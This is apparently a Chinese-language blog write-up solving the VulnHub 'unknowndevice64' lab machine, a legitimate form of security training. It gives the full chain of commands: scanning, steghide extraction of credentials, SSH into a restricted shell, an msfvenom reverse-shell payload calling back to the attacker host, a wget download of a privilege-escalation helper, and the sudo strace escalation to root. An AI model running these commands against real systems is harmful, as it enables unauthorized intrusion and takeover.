靶场下载
VulnHub: unknowndevice64
网络环境
虚拟机 | IP |
---|---|
kali | 192.168.19.142 |
unknowndevice64 | 192.168.1.132 |
通过netdiscover、nmap扫描局域网发现vulhub靶机的IP。
渗透思路
扫描端口及服务
1 | # nmap -T4 -sS -sV -p- 192.168.19.132 |
发现http服务,浏览器访问 31337端口
查看页面源代码获得提示
浏览器访问http://192.168.19.132:31337/key_is_h1dd3n.jpg
发现是一张图片。
英文提示说明数据可能隐藏在图片中。下载图片后,使用binwalk
查看是否有隐藏信息,使用exiftool
查看元数据,均无发现。
注:exiftool需要单独安装:apt-get install exiftool
使用常见图片数据隐写工具stegslove
、wbstego
、steghide
尝试进行解密,发现利用steghide工具可以提取隐藏的信息,steghide
用法示例:
1 | # 将hide.txt文件隐藏到1.jpg中: |
这里需要解密密码,我们猜测密码是提示的内容h1dd3n
,成功解密出h1dd3n.txt
文件。这里如果猜不到,可以使用密码字典暴力破解的方式,见后文cracksteghide.py
。
经常打CTF的应该很熟悉,隐藏文件的内容是经过了brainfuck编码的数据,使用Python-Brainfuck解密:
1 | git clone https://github.com/pocmo/Python-Brainfuck.git |
也可以使用在线解密工具解密:
解密结果ud64:1M!#64@ud
看起来像是用户名密码,最开始我们扫描出ssh服务运行在1337端口上,于是ssh尝试登录,发现登录成功:
登录后发现这是一个受限的shell,并且无法使用python、expect命令获得交互shell。
1 | python -c "import pty; pty.spawn('/bin/bash')" |
于是我们使用kali生成反弹木马,赋予执行权限,并通过ssh上传至目标靶机。这里从靶机的名字unknowndevice64
我们猜测可能是64位系统,不过生成32位的程序在64位系统中也能执行。
1 | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.19.142 LPORT=9999 -f elf -o revshell.elf |
因为是受限的shell,因此我们需要把木马程序上传到当前环境变量目录下,使用echo $PATH
命令查看:
1 | # echo $PATH |
上传木马
1 | scp -P 1337 revshell.elf ud64@192.168.19.132:prog |
kali启动msf监听
1 | msf5 > use exploit/multi/handler |
当目标执行revshell.elf时即可接收到反弹shell。
下一步就是提权了。在meterpreter中输入shell进入shell模式,并通过python获得一个交互shell。
kali上使用python -m SimpleHTTPServer
命令启动一个http服务,托管提权辅助脚本linuxprivchecker,靶机上下载提权脚本:
1 | wget http://192.168.19.142:8000/linuxprivchecker.py |
刚才也可以在meterpreter中直接上传脚本
1 | meterpreter > upload /root/linuxprivchecker.py /tmp/linuxprivchecker.py |
wget
下载linuxprivchecker.py
后 ,执行python linuxprivchecker.py
命令查看提权辅助脚本的输出,发现可以使用sudo进行提权。
查看下拥有sudo权限的用户或者程序,发现能够以sudo权限执行/usr/bin/sysud64
。
执行/usr/bin/sysud64 -h
命令查看这个进程的情况,发现实际上就是strace。
在GTFOBins 项目主页可以找到利用strace
提权的方法
利用strace的sudo权限进行提权
1 | sudo /usr/bin/sysud64 -o /dev/null /bin/sh |
可以看到成功提升到了root权限,在/root目录下即可查看flag.txt文件
cracksteghide.py
1 | #!/usr/bin/env python |
Reference
- Post title:Vulhub Writeup-unknowndevice64-v1
- Post author:ssooking
- Create time:2019-12-03 18:15:00
- Post link:https://ssooking.github.io/2019/12/vulhub-writeup-unknowndevice64-v1/
- Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.